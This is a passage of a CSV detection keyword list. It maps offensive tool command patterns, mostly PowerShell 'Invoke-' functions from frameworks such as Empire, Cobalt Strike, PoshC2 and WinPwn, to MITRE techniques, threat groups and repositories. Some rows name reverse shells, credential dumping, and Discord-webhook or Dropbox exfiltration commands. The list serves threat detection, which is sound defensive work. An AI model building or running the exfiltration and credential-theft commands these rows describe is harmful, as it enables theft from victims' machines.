-*Invoke-RDPwrap.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a 
post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-ReflectivePEInjection*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*Invoke-ReflectivePEInjection*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-ReflectivePEInjection.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-ReflectivePEInjection*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1107,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-ReflectivePEInjection*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1083,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-ReflectivePEInjection*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1137,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-ReflectivePEInjection*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-ReflectivePEInjection*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*Invoke-ReflectivePEInjection.*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*Invoke-ReflectivePEInjection.ps1*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*Invoke-RefreshToMSGraphToken -domain -ClientId *,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,0,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z 
-*Invoke-Reg1c1de*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z
-*Invoke-RegistryAlwaysInstallElevatedCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z
-*Invoke-RegistryAlwaysInstallElevatedCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z
-*Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($Body | ConvertTo-Json)*,offensive_tool_keyword,WLAN-Windows-Passwords,Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.,T1056.005 - T1552.001 - T1119 - T1071.001,TA0004 - TA0006 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z
-*Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile * -Headers *,offensive_tool_keyword,OMG-Credz-Plz,A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.,T1056.002 - T1566.001 - T1567.002,TA0004 - TA0040 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z
-*Invoke-ReverseSocksProxy*,offensive_tool_keyword,Invoke-SocksProxy,Socks proxy - and reverse socks server using powershell.,T1090 - T1021.001 - T1021.002,TA0002,N/A,N/A,C2,https://github.com/p3nt4/Invoke-SocksProxy,1,1,N/A,10,10,742,176,2021-03-21T21:00:40Z,2017-11-09T06:20:40Z
-*invokereverttoself*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z
-*Invoke-RevertToSelf*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z
-*Invoke-RevShellServer.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z
-*Invoke-Rubeus*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z
-*Invoke-Rubeus*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z
-*Invoke-RunAs.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z
-*Invoke-RunasCs*,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs,1,1,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z
-*Invoke-RunasCs*,offensive_tool_keyword,RunasCs,RunasCs - Csharp and open version of windows builtin runas.exe,T1059.003 - T1059.001 - T1035,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs/,1,1,N/A,6,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z
-*invoke-runaspayload*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z
-*Invoke-RunningProcessCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z
-*Invoke-S3ssionGoph3r*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z
-*Invoke-S4U-persistence.ps1*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z
-*Invoke-SafetyKatz*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z
-*Invoke-SamBackupFilesCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z
-*Invoke-SauronEye*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z
-*Invoke-SccmCacheFolderCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z
-*Invoke-ScheduledTasksCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z
-*Invoke-ScheduledTasksImagePermissionsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z
-*Invoke-ScheduledTasksUnquotedPathCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z
-*Invoke-SCMPermissionsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z
-*Invoke-ScriptSentry*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,0,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z
-*Invoke-SCShell*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z
-*Invoke-SDCLTBypass*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1130,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Invoke-SDPropagator*,offensive_tool_keyword,powershell,propagation of ACL changes on the 'AdminSDHolder' container. which can be used to maintain unauthorized access or escalate privileges in the targeted environment. The 'AdminSDHolder' container plays a crucial role in managing the security of protected groups in Active Directory. and forcing ACL changes to propagate may lead to unintended security consequences.,T1222,TA0003,N/A,N/A,Persistence,https://github.com/theyoge/AD-Pentesting-Tools/blob/main/Invoke-SDPropagator.ps1,1,1,N/A,N/A,1,57,10,2020-12-29T07:57:54Z,2020-10-14T05:01:51Z
-*Invoke-Seatbelt*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z
-*Invoke-Seatbelt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z
-*Invoke-SendMail -Targets*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,0,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z
-*Invoke-SendReverseShell*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z
-*Invoke-SensitiveHiveFileAccessCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z
-*Invoke-SensitiveHiveShadowCopyCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z
-*Invoke-ServiceAbuse*,offensive_tool_keyword,AD exploitation cheat sheet,Exploit vulnerable service permissions (does not require touching disk),T1550 - T1555 - T1212 - T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*Invoke-ServiceAbuse*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 